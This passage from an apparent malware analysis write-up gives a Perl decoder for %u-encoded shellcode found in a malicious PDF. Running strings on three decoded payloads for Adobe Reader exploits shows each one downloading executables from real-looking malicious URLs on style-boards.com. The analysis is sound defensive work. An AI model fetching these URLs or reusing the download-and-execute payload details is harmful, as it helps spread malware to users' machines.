die('file does not exist') unless -e $file;

open( FH, $file ) or die( 'Unable to open file: ' . $file );
open( RW, '>' . $file . '.dat' );
binmode RW;

# read all lines
while( <FH> )
{
 @chars = split( /%u/ );
 print "Processing line..\n";
 print "LINE CONSISTS OF " . $#chars . " CHARS\n";

 $done = -1;
 foreach my $char (@chars )
 {
 $done++; # increase done by one
 next unless $done;

 print RW pack( 'v',hex( $char ));
 }

}

close(RW);
close( FH );

So to run the script

./decode_shell shell

Now I’ve got a binary document, called shell.dat which can be easily analysed using strings

strings -a -t x shell.dat
36 QQSVW`
65 B`;U
1a8 PhhC
1d5 PSSSSSS
1f3 QQSVWjB
209 a.ex
229 YYt9
243 YYt
 W
264 YYFF;
274 QSf`
2a1 t
 @8
2ba http://style-boards.com/forum/bmosz2.exe
2e3 http://style-boards.com/forum/click.php?r=

We see that this particular shellcode (the one that is used to exploit version 9.0) is simply downloading more malware to the machine.  There are two files fetched, both of which at the time of analysis were removed from the server in question, so further analysis wasn’t possible.

To test the other payloads, we examine the one that exploits the util_printf vulnerability.

/decode_shell util_shell
Processing line..
LINE CONSISTS OF 391 CHARS
strings -a -t x util_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/cdruz2.exe
2e3 http://style-boards.com/forum/click.php?r=

And the collab_email exploit:

/decode_shell collab_email_shell
Processing line..
LINE CONSISTS OF 392 CHARS
strings -a -t x collab_email_shell.dat
...
209 a.ex
...
2ba http://style-boards.com/forum/fkntuw2.exe
2e4 http://style-boards.com/forum/click.php?r=

We can see that for each of the exploits there are two executable files downloaded.  And the file that comes with “click.php?r=” seems to be the same one for each of them.  The second executable does have a different name, fkntuw2.exe, cdrusz2.exe, bmosz2.exe

I was unable to analyze the executables further since they had all been removed from the server at the time I tried to download them, got a 404 error from the server.  Although the PDF document still remained on the server the last time I checked.

This concluded the static analysis of the code,  I also did a live dynamic analysis of the malware that I might share at a later time, but for now, let the static analysis do.

-->